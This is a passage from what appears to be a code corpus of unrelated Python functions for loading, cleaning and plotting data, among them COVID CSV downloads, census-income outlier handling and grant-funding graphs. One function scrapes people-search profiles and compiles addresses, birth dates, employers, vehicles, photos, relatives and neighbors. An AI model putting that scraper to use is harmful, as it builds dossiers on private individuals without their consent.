I.CCRI data\r\n table = pd.pivot_table(data, index=['date'], columns=['factor_code'], values='factor_value')\r\n table = table.sort_values(by='date')\r\n \r\n return table", "def yaml_parser_preprocess_pipeline_input_parameter_get_description_df(config):\n df= pandas.DataFrame.from_dict(config['query_system']['profile_description'], orient = 'index')\n df['query_protein_name'] = df.index\n return df", "def extract_data():\n raw_data = 
pd.read_csv(\"../../../resource/DataVisualization/vaccinations.csv\")\n raw_data = raw_data[[\"location\", \"date\", \"people_fully_vaccinated_per_hundred\"]]\n raw_data.date = pd.to_datetime(raw_data.date, format=\"%Y-%m-%d\")\n min_date = raw_data.date.min()\n raw_data.date = raw_data.date-min_date\n raw_data.date = pd.Series([x.days for x in raw_data.date])\n raw_data.drop(raw_data.loc[raw_data.people_fully_vaccinated_per_hundred.isnull()].index,\n axis=0, inplace=True)\n raw_data[\"people_fully_vaccinated_per_hundred\"] /= 100\n\n data_dict = dict()\n for country in raw_data.location.unique():\n if len(raw_data.loc[raw_data.location == country]) >= 100:\n tmp_data = raw_data.loc[raw_data.location == country]\n tmp_data.drop(\"location\", axis=1, inplace=True)\n data_dict[country] = {\"data\":tmp_data}\n else:\n raw_data.drop(raw_data.loc[raw_data.location ==\n country].index, inplace=True)\n return data_dict, min_date, raw_data", "def _createDataFromProject(self):\n project_dict = self._project.asDict()\n data_blocks = {}\n headers_blocks = {}\n for experiment_id, experiment_dict in project_dict['experiments'].items():\n data = []\n headers = []\n for data_id, data_list in experiment_dict['calculated'].items():\n headers.append(data_id)\n data.append(data_list)\n headers_blocks[experiment_id] = headers\n data_transposed = [*zip(*data)]\n data_blocks[experiment_id] = data_transposed\n return headers_blocks, data_blocks", "def _createDataFromProject(self, project):\n data = []\n headers = []\n project_dict = project.asDict()\n for experiment_id, experiment_dict in project_dict['experiments'].items():\n for data_id, data_list in experiment_dict['measured'].items():\n headers.append(data_id)\n data.append(data_list)\n data_transposed = [*zip(*data)]\n return headers, data_transposed", "def lifedata_hpi():\n\n # A constant that defines the record fields that we wish to retrieve.\n FIELDS = {\n '_id': False, 'Country': True, 'CountryCode': True, 'Life Expectancy': True, 'Well-being(0-10)': True, 'Happy Life Years': True, 'Happy Planet Index': True,\n 'Population': True, 'GDP/capita': True, 'Governance Rank(1 - highest gov.)': True\n }\n\n # Open a connection to MongoDB using a with statement such that the\n # connection will be closed as soon as we exit the with statement\n with MongoClient(MONGODB_HOST, MONGODB_PORT) as conn:\n # Define which collection we wish to access\n collection = conn[DBS_NAME][COLLECTION_NAME]\n # Retrieve a result set only with the fields defined in FIELDS\n # and limit the the results to 55000\n projects = collection.find(projection=FIELDS, limit=55000)\n # Convert projects to a list in a JSON object and return the JSON data\n return json.dumps(list(projects))", "def xnat_workflow_info_show(args):\n\trequest_url = \"http://\" + args.server + \"/data/services/workflows/workflowid/\" + args.workflow_id + \"?format=json\"\n\tprint(\"xnat_workflow_info show: request_url: \" + request_url)\n\tresponse = requests.get(request_url, auth=(args.username, args.password))\n\tif (response.status_code != 200):\n\t\tprint(\"Cannot get response from request: \" + request_url)\n\t\tsys.exit(1)\n\n\tjson_response = json.loads(response.text)\n\tjson_items = json_response['items']\n\ti = 0\n\tfor json_item in json_items:\n\t\ti = i + 1\n\t\tprint i\n\n\t\t# meta\n\t\tjson_meta = json_item['meta']\n\t\tisHistory = json_meta['isHistory']\n\t\ttype = json_meta['xsi:type']\n\t\tstart_date = json_meta['start_date']\n\n\t\tprint \" isHistory: \" + str(isHistory)\n\t\tprint \" type: \" + 
type\n\t\tprint \" start_date: \" + start_date\n\t\n\t\t# children\n\t\t#json_children = json_item['children']\n\t\t#print \" children\"\n\t\t#print json_children\n\n\t\t# data_fields\n\t\tjson_data_fields = json_item['data_fields']\n\t\tstatus = json_data_fields['status']\n\t\tworkflow_id = json_data_fields['wrk_workflowData_id']\n\t\tdata_type = json_data_fields['data_type']\n\t\tlaunch_time = json_data_fields['launch_time']\n\t\tExternalID = json_data_fields['ExternalID']\n\t\tpipeline_name = json_data_fields['pipeline_name']\n\t\tID = json_data_fields['ID']\n\t\n\t\tprint \" status: \" + status\n\t\tprint \" workflow_id: \" + str(workflow_id)\n\t\tprint \" data_type: \" + data_type\n\t\tprint \" launch_time: \" + launch_time\n\t\tprint \" ExternalID: \" + ExternalID\n\t\tprint \" pipeline_name: \" + pipeline_name\n\t\tprint \" ID: \" + ID\n\n\t\tprint \" All Data Fields:\"\n\t\tprint \" \" + str(json_data_fields)", "def _get_data(self):\n project_name, experiment_id = self.parent._get_parent_identifiers()\n\n self._data = self.repository.get_dataframe_data(\n project_name, self.id, experiment_id=experiment_id\n )", "def get_details(i, df):\n print(\"Name:\", df.name.loc[i])\n print(\"Gender:\", df.gender.loc[i])\n print(\"Age in months:\", df.age.loc[i])\n print(\"Breed:\", df.breed1_desc.loc[i].title().replace(\"_\",\" \"),df.breed2_desc.loc[i].title().replace(\"_\",\" \"))\n print(\"Color/s:\", df.color1_desc.loc[i].title(), df.color2_desc.loc[i].title(), df.color3_desc.loc[i].title())\n print(\"Fur Length:\", df.fur_length.loc[i])\n print(\"Vaccinated:\", df.vaccinated.loc[i])\n print(\"Dewormed:\", df.dewormed.loc[i])\n print(\"Spayed or Neutered:\", df.sterilized.loc[i])\n print(\"Health:\", df.health.loc[i])\n print(\"No. of Pets in this Listing:\", df.quantity.loc[i])\n if df.fee.loc[i] == 0:\n print(\"Adoption Fee: FREE\")\n else:\n print(\"Adoption Fee: MYR\", round(df.fee.loc[i],2))\n print(\"Location :\", df.state_desc.loc[i].title().replace(\"_\",\" \"))\n print(\"Description :\", df.description.loc[i])\n print_images(i, df)", "def main():\n\n # Instantiate the class\n my_data = DataProject(TRAIN_URL, TEST_URL, HEADER_URL)\n\n # Check which columns contain missing data\n print(my_data.get_na_cols('train_df'))\n\n # We see 'workclass', 'occupation', 'native-country' all have missing\n # values. However, these are all categorical columns. Let's try\n # seeing what we can from the numerical columns\n print(my_data.train_df.describe())\n\n \"\"\"see:\n age goes from 17-90, but doesn't look too surprising.\n fnlwgt is a weight that is given to each line to show how representative\n of the full population it is (at least, how representative of the\n state it was drawn from??).\n education-num is actually a classification of different categories of\n education, and maps one-to-one with that column. I will drop this next\n capital-gain and capital-loss -- these seem reasonable, but are highly\n skewed to the right (up to the 75% is 0). So let's take a look at that\n distribution to see what it looks like\n hours-per-week shows nothing too extrodinary, except that the max is\n 99 hours a week! If this person is doing this weekly, although it is\n do-able, this is incredible!\n \"\"\"\n \n # as we noted in our observation, education-num is just a numbering\n # of the education factors. 
So, remove, since it doesn't give any extra\n # information\n my_data.train_df.drop('education-num', axis=1, inplace=True)\n my_data.test_df.drop('education-num', axis=1, inplace=True)\n\n # Now, let's see if we can spot anything if we visualize the data.\n # Note, the scatter_matrix method grabs all numerical columns and shows\n # a nice grid of plots to make it easy to see the distribution of the\n # values in these columns, and any correlations that might exist between\n # columns.\n #\n # (PS, I realize if we are just executing the script directly, the plots\n # will just flash by, but I didn't want to clutter the HD with saved\n # images, so I assume you'll be following along this part by just running\n # the things in main() one by one)\n pd.plotting.scatter_matrix(my_data.train_df)\n plt.show()\n\n \"\"\"see:\n A good amount of binning of age and hours-per-week into discrete values\n (probably integer values for each). Also, perhaps an overabundance of\n people at age 90 and that work 99 hours a week, but these are probably\n individuals that go even higher, but were truncated at these values.\n Overall, nothing really out of the ordinary, except for in capital-gain,\n it looks like there is a big jump from most of the values up to 99999\n (nothing between ~50k to 99,999), with the vast majority of the\n values at 0 (makes sense, since if we look at the capital-gain vs\n capital-loss plot, it looks like we can only have non-zero values for\n one of those categories.) Let's try looking at captial-gain without\n the capital-loss individuals\n \"\"\"\n\n # Plot capital-gains without people that have a capital-loss (who are given\n # capital-gain of 0)\n my_data.train_df['capital-gain']\\\n [my_data.train_df['capital-gain'] != 0].hist()\n plt.show()\n\n \"\"\"see:\n True enough, it looks like there is an over-abundance of values for\n individuals with a capital-gain of 99,999. Let's have pandas calculate\n the quartiles to confirm.\n \"\"\"\n\n # Get the quartiles for the capital-gain column, excluding the capital-loss\n # individuals\n my_data.train_df['capital-gain']\\\n [my_data.train_df['capital-gain'] != 0].describe()\n\n \"\"\"Indeed, it looks like the 99,999 values are outliers, as the 75% of\n the non-0 values is at 14,084.\n \"\"\"\n\n # I was originally going to try to fit a gaussian distribution to the\n # histogram to re-assign the 99,9999 individuals based on it, but if\n # we take a look at:\n my_data.train_df['capital-gain'][\n (my_data.train_df['capital-gain'] != 0) &\n (my_data.train_df['capital-gain'] < 75000)].hist(bins=100)\n plt.show()\n\n # We see this is a tri-modal distribution (it'll be interesting to\n # see what makes up the groups at the 7-8 thousand range, and the group\n # at ~15 tousand).So, instead, replace with a value randomly picked from\n # the exact non-zero, non-99,9999 distribution. 
First, need to grab\n # these values\n good_val = my_data.train_df['capital-gain'][\n (my_data.train_df['capital-gain'] != 0) &\n (my_data.train_df['capital-gain'] < 99999)].values\n\n # Now, define a function that will return a random instance of\n # the good values\n def get_good_val(vals=good_val):\n \"\"\"quick helper function to allow easy re-assigning of the outlier\n values in the capital-gain column, preserving the non-zero\n distribution.\n\n Args:\n vals (np.ndarray): The non-zero, non-99,999 values from the\n capital-gain column\n\n Returns:\n int: A random value from the distribution\n \"\"\"\n\n # Return a value from the distribution randomly\n return vals[rand.randint(0, (vals.shape[0] - 1))]\n\n # Now, use the helper function to reset outlier values based on the\n # non-zero, non-outlier distribution\n # First, define a mask to save the conditions we want\n mask = (my_data.train_df['capital-gain'] == 99999)\n\n # Now, for these outlier values, reset them based on the good values\n # distribution\n my_data.train_df.loc[mask, 'capital-gain'] = (\n my_data.train_df[mask]['capital-gain'].apply(lambda x: get_good_val())\n )\n\n # Check the distribution that it looks ok\n my_data.train_df[my_data.train_df['capital-gain'] != 0]['capital-gain']\\\n .hist(bins=40)\n plt.show()\n\n # Looking at the test dataset:\n pd.plotting.scatter_matrix(my_data.test_df)\n plt.show()\n\n # It looks like we have a similar problem, so repeat the procedure\n # For the test set, using the test set's distribution\n good_val = my_data.test_df['capital-gain'][\n (my_data.test_df['capital-gain'] != 0) &\n (my_data.test_df['capital-gain'] < 99999)].values\n\n # Define the mask\n mask = (my_data.test_df['capital-gain'] == 99999)\n\n # Now, for these outlier values, reset them based on the good values\n # distribution\n my_data.test_df.loc[mask, 'capital-gain'] = (\n my_data.test_df[mask]['capital-gain'].apply(\n lambda x: get_good_val(good_val))\n )\n\n # Check the distribution that it looks ok\n my_data.test_df[my_data.test_df['capital-gain'] != 0]['capital-gain']\\\n .hist(bins=40)\n plt.show()", "def generate_personnel_trend_graph(selected_funding, selected_year, selected_row_indices, rows, search_ids_personnel, search_ids_professors_keywords, personnel_name, search_keywords):\n\n names = []\n personnel = pd.DataFrame(rows)\n if selected_row_indices:\n names = personnel[\"Personnel\"].iloc[selected_row_indices]\n\n\n filtered_data = funding_data[\n funding_data.start_year.isin(selected_year)\n # & funding_data['Submitting Institution Name:'].isin(selected_uni)\n # & funding_data['Project Status:'].isin(selected_award_status)\n & funding_data['Program Cycle:'].isin(selected_funding)]\n\n\n selected_personnel_data = filtered_data.loc[filtered_data[\"Lead Investigator:\"].isin(names)]\n\n\n\n # Getting the projects of the selected names from personnel_data\n\n personnel_data_filtered = personnel_data\n personnel_data_filtered = personnel_data_filtered[\n personnel_data_filtered[\"Proposal Number:\"].isin(filtered_data[\"Proposal Number:\"])]\n\n personnel_data_filtered = personnel_data_filtered[personnel_data_filtered[\"investigator\"].isin(names)]\n\n # A pandas dataframe containg the list of projects for each selected personnel\n\n if search_keywords and len(search_keywords) > 0:\n if len(search_ids_professors_keywords) > 0:\n search_ids_professors_keywords = json.loads(search_ids_professors_keywords)\n search_ids_professors_keywords = np.array(search_ids_professors_keywords)\n\n # Using the dataset only 
to get relevant names of the personnel who are involved in the project\n # from personnel_data\n filtered_data = filtered_data[filtered_data._id.isin(search_ids_professors_keywords[0:, 0])]\n list_of_projects = filtered_data[\"Proposal Number:\"]\n personnel_data_filtered = personnel_data_filtered[\n personnel_data_filtered[\"Proposal Number:\"].isin(list_of_projects)]\n\n # print(\"Personnel Projects list is \", personnel_projects_list)\n # personnel_names = personnel_data_filtered[\"investigator\"].unique()\n # print(\"Personnel Who have worked in this field are \", personnel_names)\n\n personnel_projects_list = personnel_data_filtered.groupby('investigator')['Proposal Number:'].apply(list)\n print(\"Personnel Projects list is \", personnel_projects_list)\n\n\n\n\n # if personnel_name and len(personnel_name) > 0:\n # if len(search_ids_personnel) > 0:\n # # Using the dataset only to get relevant names of the personnel who are involved in the project\n # # from personnel_data\n #\n # personnel_data_filtered = personnel_data_filtered[personnel_data_filtered._id.isin(search_ids_personnel)]\n #\n # # Filtering the datasets based on search ids and filtered_data\n # # Find a better way to do filters by join?\n #\n # filtered_data = filtered_data[\n # filtered_data[\"Proposal Number:\"].isin(personnel_data_filtered[\"Proposal Number:\"])]\n #\n # personnel_projects_list = personnel_data_filtered[[\"investigator\", \"Proposal Number:\"]].groupby(\n # 'investigator').agg({\"Proposal Number:\": lambda x: [].append(x)})\n #\n # print(\"Personnel Projects list is \", personnel_projects_list)\n # personnel_names = personnel_data_filtered[\"investigator\"].unique()\n # print(\"Personnel Who have worked in this field are \", personnel_names)\n\n\n def make_project_count_dict(df):\n \"\"\"\n From the DF that is passed ( containing one personnel with all his projects, calculates the number of years a\n project was active,\n :param df:\n :return: An Ordered Dictionary with the number of projects active per year for that personnel.\n \"\"\"\n year_lists = []\n null_date_info_projects = 0\n for i in range(len(df)):\n start_date = df[\"Start Date:\"].iloc[i]\n end_date = df[\"End Date:\"].iloc[i]\n if (start_date == -1) or (end_date == -1):\n null_date_info_projects += 1\n continue\n year_lists.append(list(range(start_date.year, end_date.year + 1))) # +1 because the project is active that year. 
It needs to show on graph\n print(year_lists)\n year_count_dict = OrderedDict.fromkeys(range(2000, datetime.now().year + 5), 0)\n print(year_count_dict)\n for i in year_lists:\n for j in i:\n year_count_dict[j] += 1\n return year_count_dict, null_date_info_projects\n\n def make_traces(names, personnel_projects_list):\n traces = []\n null_date_info_projects = 0\n for i in names:\n list_of_projects = personnel_projects_list.loc[i]\n # list_of_projects = personnel_projects_list[\"Proposal Number:\"].loc[personnel_projects_list[\"investigator\"] == i]\n list_of_project_records = filtered_data.loc[filtered_data[\"Proposal Number:\"].isin(list_of_projects)] # Passing the DF containing all the projects that a personnel was involved with\n personnel_year_count_dict, null_date_info_projects = make_project_count_dict(list_of_project_records)\n sample_trace_object = go.Scatter(\n x=list(personnel_year_count_dict.keys()),\n y=list(personnel_year_count_dict.values()),\n opacity=0.7,\n # Adding the null_date_info_projects into the name\n name=i +\" \"+ str(null_date_info_projects),\n line=dict(\n # color=('rgb(22, 96, 167)'),\n width=4,\n shape='hv'\n # colorscale='YlGnBu'\n ),\n mode='lines+markers'\n )\n traces.append(sample_trace_object)\n return traces\n\n traces = make_traces(names, personnel_projects_list)\n\n\n # years = [i for i in range(2008,2018)]\n # numbers = random.choices(population=[0, 1, 2, 3], k=len(years))\n\n # personnel = \"Doctor Name\"\n\n # trace1 = go.Scatter(\n # x=years,\n # y=numbers,\n # name='Professor Name Here',\n # line=dict(\n # color=('rgb(22, 96, 167)'),\n # width=4,\n # ),\n # mode='lines+markers'\n # )\n\n\n return {\n 'data': traces,\n 'layout': go.Layout(\n # autosize=False,\n title='Projects in a year for selected personnel',\n xaxis=dict(\n # tickangle=-45,\n zeroline=False, # no thick y=0 line\n showgrid=False, # no horizontal grid lines\n showticklabels=True, # no y-axis tick labels\n dtick=1,\n ),\n yaxis=dict(\n # type='log'\n dtick=1,\n ),\n showlegend=True,\n # legend=go.Legend(\n # x=0,\n # y=1.0\n # ),\n # legend=dict(x=.75, y=1),\n # bargap =0.5,\n # width = 100,\n # autosize=F,\n margin=go.layout.Margin(l=40, r=0, t=30, b=40),\n # paper_bgcolor='rgb(233,233,233)', # set paper (outside plot)\n plot_bgcolor='rgb(192,192,192)', # plot color to grey\n )\n }", "def _deep_data(self, url):\n def _nested_persons(persons):\n _persons = list()\n for person_ in persons:\n person_ = [r.text.split(', ') for r in person_.find_all(class_='default-text')]\n person = {'name': person_[0][0].title()}\n if len(person_[0]) == 2:\n person['age'] = person_[0][1]\n\n if len(person_[1]) > 0:\n person['addressLocality'] = person_[1][0].title()\n if len(person_[1]) == 2:\n person['addressRegion'] = person_[1][1].upper()\n\n _persons.append(person)\n return _persons\n\n with self.driver(self.DRIVER_DIR) as driver:\n driver.get(url)\n driver.fullscreen_window()\n time.sleep(2)\n txt = driver.page_source\n\n soup = bs(txt, 'html.parser')\n\n profile_data = soup.find(type=\"application/ld+json\")\n if profile_data is None:\n self._raise_site_schema_change()\n profile_data = profile_data.string\n profile_data = json.loads(profile_data, strict=False)\n profile_data['@id'] = profile_data.pop('@id').split('/')[-1]\n\n try:\n about = profile_data.pop('about')\n for k, v in about.items():\n profile_data[k] = v\n except KeyError:\n pass\n\n name_ = profile_data.pop('name')\n profile_data['name'] = name_\n\n name_ = name_.split()\n profile_data['givenName'] = name_[0]\n 
profile_data['middleName'] = ' '.join(name_[1:-1])\n profile_data['familyName'] = name_[-1]\n\n if soup.find(class_='rep-vcard-score') is not None:\n profile_data['reputation_score'] = \"{min}-{max}\".format(\n min=soup.find(class_='rep-vcard-min').text,\n max=soup.find(class_='rep-vcard-max').text\n )\n\n address = list()\n address_ = soup.find_all(class_='card-address')\n for a in address_:\n street_address, locality_region_postal, *misc = [_.text for _ in a.find_all(class_='block-container')]\n address_locality, locality_region_postal = locality_region_postal.split(',')\n address_region, postal_code = locality_region_postal.split()\n address.append({\n 'streetAddress': street_address,\n 'addressLocality': address_locality,\n 'addressRegion': address_region,\n 'postalCode': postal_code,\n })\n\n profile_data['address'] = address\n\n personal_details = soup.find(class_='card-personal-details')\n if personal_details is not None:\n personal_details = personal_details.find_all(class_='item-container')\n personal_details = [detail.text.split(': ') for detail in personal_details]\n personal_details = [_ for _ in personal_details if len(_) == 2]\n personal_details = {detail.lower().replace(' ', '_'): value for\n detail, value in personal_details if value != 'Add Info'}\n\n birth_date = personal_details.pop('date_of_birth')\n if len(birth_date) > 0:\n profile_data['birthDate'] = birth_date\n\n for key_, value_ in personal_details.items():\n profile_data[key_] = value_\n\n # Education\n schools_ = soup.find(class_='card-education')\n if schools_ is not None:\n schools = list()\n schools_ = schools_.find_all(class_='card-content')\n for school in schools_:\n school = [detail.text.split(': ') for detail in school.find_all(class_='item-container')]\n school = {detail.lower().replace(' ', '_'): value for\n detail, value in school if value != 'Add Info'}\n\n if len(school) == 0:\n continue\n\n school['@type'] = 'EducationalOrganization'\n school['name'] = school.pop('school')\n school['streetAddress'], school['addressLocality'] = school.pop('city').split(', ')\n schools.append(school)\n\n # Work\n employers = soup.find(class_='card-job')\n if employers is not None:\n works_for = list()\n employers = employers.find_all(class_='card-content')\n for employer in employers:\n employer = [detail.text.split(': ') for detail in employer.find_all(class_='item-container')]\n employer = {detail.lower().replace(' ', '_'): value for\n detail, value in employer if value != 'Add Info'}\n\n if len(employer) == 0:\n continue\n\n employer['@type'] = 'Organization'\n try:\n employer['name'] = employer.pop('company')\n except KeyError:\n continue\n\n if len(employer.get('city', '')) > 0:\n employer['streetAddress'], employer['addressLocality'] = employer.pop('city').split(', ')\n\n works_for.append(employer)\n\n if len(works_for) > 0:\n profile_data['worksFor'] = works_for\n\n # Automobiles\n automobiles = soup.find(class_='card-auto')\n if automobiles is not None:\n owns = list()\n automobiles = automobiles.find_all(class_='card-content')\n for automobile in automobiles:\n automobile = [detail.text.split(': ') for detail in automobile.find_all(class_='item-container')]\n automobile = {detail.lower().replace(' ', '_'): value for\n detail, value in automobile if value != 'Add Info'}\n\n if len(automobile) == 0:\n continue\n\n automobile['@type'] = 'Product'\n automobile['model'] = ' '.join([\n automobile.pop('year'),\n automobile.pop('make'),\n automobile.pop('model')\n ])\n owns.append(automobile)\n\n if len(owns) > 0:\n 
profile_data['owns'] = owns\n\n profile_data['relatedTo'] = _nested_persons(soup.find_all(class_='relative-container'))\n profile_data['neighbors'] = _nested_persons(soup.find_all(class_='neighbor-container'))\n\n # Photos\n profile_data['pictures'] = list({photo['src'] for photo in soup.find_all(class_='profile-picture-holder')})\n return profile_data", "def get_data():\n \n \"\"\" Prepare variables\"\"\"\n urls = {\"cases\": \"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Confirmed.csv\",\n \"deaths\": \"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Deaths.csv\",\n \"recovered\": \"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Recovered.csv\"}\n\n localnames = {\"cases\": \"Cases.csv\",\n \"deaths\": \"Deaths.csv\",\n \"recovered\": \"Recovered.csv\"}\n\n dfs = {\"cases\": None,\n \"deaths\": None,\n \"recovered\": None}\n\n \"\"\" Download\"\"\"\n for key in urls.keys():\n url = urls[key]\n localname = localnames[key]\n urllib.request.urlretrieve(url, localname)\n\n \"\"\" Load variables\"\"\"\n for key in dfs.keys():\n dfs[key] = pd.read_csv(localnames[key])\n \n \"\"\" Return\"\"\"\n return(dfs)", "def get_individual_df(nombre):\n clusters = []\n contadores = []\n for k, v in mydic[nombre][\"contador\"].items():\n clusters.append(k)\n contadores.append(v)\n return pd.DataFrame({\"CODIGO_POSTAL\": clusters, f\"contadores_{nombre}\": contadores})", "def get_metadata(datas):\n\n required_profile_key, required_item_key = 'basics', 'category'\n utility_matrix = []\n\n item_details, profile_details = {}, {}\n\n for _ , data in datas.items():\n profile_name, item_name = None, None\n\n # extracted profile data for user, because two user may have the same nick name\n # so we will concatenate user nick name and its profile link to form the unique one.\n if type(data) is dict and required_profile_key in data.keys() :\n profile_name = \"%s|%s\" % (data[required_profile_key].get('name',''),\n data[required_profile_key].get('profile',''))\n\n profile_details[profile_name] = get_profile_detail(data)\n print ('extracted data of profile: %s ...' % data[required_profile_key].get('name',''))\n\n # for item\n if type(data) is dict and required_item_key in data.keys():\n if hasattr(data[required_item_key],'items'):\n for k,v in data[required_item_key].items():\n\n item_detail = get_item_detail(v)\n print ('extracted data for category %s ...' 
% k)\n\n #item_detail_to_str = json.dumps(item_detail) #\" ; \".join(list(set(item_detail)))\n if k in item_details:\n item_details[k]['work'].append(item_detail['work'])\n item_details[k]['skill'].append(item_detail['skill'])\n else:\n item_details[k] = {}\n item_details[k]['work'] = [item_detail['work']]\n item_details[k]['skill'] = [item_detail['skill']]\n\n utility_matrix.append({\n 'profile': profile_name,\n 'item': k,\n 'rating':v['point']\n })\n\n return utility_matrix, \\\n {k:{'work':json.dumps(v['work']),'skill':json.dumps(v['skill'])} for k,v in item_details.items()}, \\\n profile_details", "def parse_info(df, idx, root):\n df_row = df.iloc[idx]\n\n img_id = str(df_row['id'])\n img_name = id_to_path(root, img_id)\n landmark_id = df_row.landmark_id\n return img_name, landmark_id", "def read_json_stats(url, parameters, tunnus):\r\n \r\n\r\n import requests \r\n from pyjstat import pyjstat\r\n from collections import OrderedDict\r\n import pandas as pd\r\n \r\n \r\n #query from JSON to be able to flatten data to one level\r\n col_list=[]\r\n for j in parameters[\"query\"]:\r\n col_list.append(j['code'])\r\n \r\n \r\n col_list.remove(tunnus)\r\n\r\n response = requests.post(url, json=parameters)\r\n if response.status_code == 200:\r\n try:\r\n json_data = response.json(object_pairs_hook=OrderedDict)\r\n except:\r\n print('Json error !!!!')\r\n return\r\n else:\r\n print('Error: Status code: {}'.format(response.status_code))\r\n return\r\n \r\n results = pyjstat.from_json_stat(json_data)\r\n stat=pd.DataFrame(results[0])\r\n stat = pd.pivot_table(stat, values='value', index=[tunnus],columns=col_list)\r\n stat.fillna(0,inplace=True)\r\n stat.reset_index(level=[0], inplace=True)\r\n if len(col_list) > 1:\r\n stat.columns = stat.columns.map(' '.join)\r\n stat.columns = stat.columns.str.strip()\r\n return(stat)", "def precipitation():\n\n return jsonify(prcp_df)", "def _info(self) -> tfds.core.DatasetInfo:\n features = tfds.features.FeaturesDict({\n \"tokens\":\n tfds.features.Sequence(tfds.features.Text()),\n \"tags\":\n tfds.features.Sequence(\n tfds.features.ClassLabel(names=[\n \"O\",\n \"B-PER\",\n \"I-PER\",\n \"B-ORG\",\n \"I-ORG\",\n \"B-LOC\",\n \"I-LOC\",\n ])),\n \"langs\":\n tfds.features.Sequence(tfds.features.Text()),\n \"spans\":\n tfds.features.Sequence(tfds.features.Text()),\n })\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=features,\n supervised_keys=None,\n homepage=\"https://github.com/afshinrahimi/mmner\",\n citation=_CITATION,\n )", "def get_task_flow_data(jeditaskid):\n data = []\n # get datasets\n datasets = []\n dquery = {'jeditaskid': jeditaskid, 'type__in': ['input', 'pseudo_input'], 'masterid__isnull': True}\n datasets.extend(JediDatasets.objects.filter(**dquery).values('jeditaskid', 'datasetname', 'type'))\n\n dataset_dict = {}\n for d in datasets:\n dname = d['datasetname'] if ':' not in d['datasetname'] else d['datasetname'].split(':')[1]\n dataset_dict[dname] = {'replica': {}, 'jobs': {}}\n\n # get jobs aggregated by status, computingsite and proddblock (input dataset name)\n jobs = []\n jquery = {'jeditaskid': jeditaskid, 'prodsourcelabel__in': ['user', 'managed'], }\n extra_str = \"( processingtype not in ('pmerge') )\"\n jvalues = ['proddblock', 'computingsite', 'jobstatus']\n jobs.extend(Jobsarchived4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n 
jobs.extend(Jobsarchived.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n jobs.extend(Jobsactive4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n jobs.extend(Jobsdefined4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n jobs.extend(Jobswaiting4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n\n if len(jobs) > 0:\n for j in jobs:\n if len(j['proddblock']) > 0:\n dname = j['proddblock'] if ':' not in j['proddblock'] else j['proddblock'].split(':')[1]\n else:\n dname = next(iter(dataset_dict)) if len(dataset_dict) > 0 else 'pseudo_dataset'\n if j['computingsite'] is not None and j['computingsite'] != '':\n if j['computingsite'] not in dataset_dict[dname]['jobs']:\n dataset_dict[dname]['jobs'][j['computingsite']] = {}\n job_state = j['jobstatus'] if j['jobstatus'] in const.JOB_STATES_FINAL else 'active'\n if job_state not in dataset_dict[dname]['jobs'][j['computingsite']]:\n dataset_dict[dname]['jobs'][j['computingsite']][job_state] = 0\n dataset_dict[dname]['jobs'][j['computingsite']][job_state] += j['njobs']\n\n # get RSE for datasets\n replicas = []\n if len(datasets) > 0:\n dids = []\n for d in datasets:\n if d['type'] == 'input':\n did = {\n 'scope': d['datasetname'].split(':')[0] if ':' in d['datasetname'] else d['datasetname'].split('.')[0],\n 'name': d['datasetname'].split(':')[1] if ':' in d['datasetname'] else d['datasetname'],\n }\n dids.append(did)\n\n rw = ruciowrapper()\n replicas = rw.getRSEbyDID(dids)\n\n if replicas is not None and len(replicas) > 0:\n for r in replicas:\n if r['name'] in dataset_dict:\n dataset_dict[r['name']]['replica'][r['rse']] = {\n 'state': r['state'],\n 'available_pct': round(100.0 * r['available_length']/r['length'], 1) if r['length'] > 0 else 0\n }\n\n # transform data for plot and return\n return executeTF({'data': {'datasets': dataset_dict, } })", "def print_record_project_count(dataframe, dataset=\"full\"):\n if dataset == \"full\":\n print(\n \"For the ORIGINAL cleansed data, containing all available NYC capital \"\n \"projects change records:\\n\"\n )\n\n elif dataset == \"all\":\n print(\n \"For the data containing start and end data for all available \"\n \"NYC capital projects for the ENTIRE INTERVAL of changes \"\n \"covered in the ORIGINAL data:\\n\"\n )\n\n else:\n print(\n \"For the final {} data, containing the {} split of 3-year \"\n \"project data used in this analysis:\\n\".format(\n dataset.upper(), dataset\n )\n )\n\n # entries\n print(f\"\\tNumber of dataset records: {len(dataframe)}\")\n\n # num projects\n print(\n f\"\\tNumber of unique projects in dataset: {dataframe['PID'].nunique()}\\n\"\n )", "def define_info_dict():\n\n d = {\n \"PRED\": {\n \"COLUMN\": [\"predicted_class\"],\n \"Number\": \"1\",\n \"Type\": \"String\",\n \"Description\": \"Predicted class: somatic, germline, artifact\",\n },\n \"PROB\": {\n \"COLUMN\": [\"prob_s\", \"prob_g\", \"prob_a\"],\n \"Number\": \"3\",\n \"Type\": \"Float\",\n \"Description\": \"Prediction probability of \"\n \"being somatic, germline, artifact in this order\",\n },\n \"SNP\": {\n \"COLUMN\": [\"is_on_db\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Present on SNP database (modified dbSNP/gnomAD (default) or user-provided database)\",\n },\n \"ANNO\": {\n \"COLUMN\": [\"annotation\"],\n \"Number\": \".\",\n \"Type\": \"String\",\n \"Description\": 
